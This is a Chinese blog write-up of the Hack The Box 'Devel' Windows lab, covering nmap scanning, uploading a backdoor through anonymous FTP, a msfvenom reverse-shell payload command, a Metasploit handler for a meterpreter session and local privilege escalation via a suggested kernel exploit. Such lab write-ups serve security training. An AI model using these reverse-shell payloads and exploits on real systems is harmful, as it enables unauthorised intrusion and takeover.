HTB 学习笔记

【Hack The Box】windows练习-- devel

🔥系列专栏：Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间：🌴2022年10月28日🌴
🍭作者水平很有限，如果发现错误，还望告知，感谢！

文章目录

HTB 学习笔记
- 信息收集
- ftp枚举
- 后门植入
- 生成payload
- msf利用
- 提权

信息收集

Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-28 08:24 EDT
Nmap scan report for 10.129.6.232
Host is up (0.67s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM                 aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS7

ftp允许匿名登陆
还有一个80页面
在这里插入图片描述

ftp枚举

匿名登陆
Anonymous
在这里插入图片描述
发现有一个图片，get下载到本地之后发现
就是80页面的首页
那就试试上传，看能不能直接上传上去一个后门

后门植入

在这里插入图片描述成功上传，那接下来就生成payload

生成payload

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

这里之所以生成aspx的后门文件是因为使用了iis文件
在这里插入图片描述成功上传（这里注意，要清楚自己设置的什么端口）

但是可以看到我们自己做的shell完全执行不了命令，linux中常用的几个稳定反弹shell的方法都用不了了，但是我不想用msf，因为这不利于我的oscp考试，于是我试图不利用msfvenom生成payload，但是这台机器中很多语言都没有（几乎没有任何语言。而针对于windows的shell门类我还欠缺很多）太遗憾了，只能使用msf接受shell了

msf利用

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
设置LHOST LPORT
然后run
然后去web访问一下那个aspx文件

提权

在这里插入图片描述然后拿到shell
这里我认为完全可以上传winpeas等来枚举信息然后利用漏洞提权
但是我真的不知道有哪些脚本可以起到这个作用，我是一个windows新手
所以就简单的利用msf来提权了
这个靶场我会再做一次的

meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf5 post(multi/recon/local_exploit_suggester) > run[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

use post/multi/recon/local_exploit_suggester
use exploit/windows/local/ms10_015_kitrap0d
然后run即可

词库加载错误:未能找到文件“E:\highferrum_mysql\Configuration\Dict_Stopwords.txt”。

上一篇：【小程序开发】事件监听 | 类型划分 | 属性分析

下一篇：【Linux练习生】线程池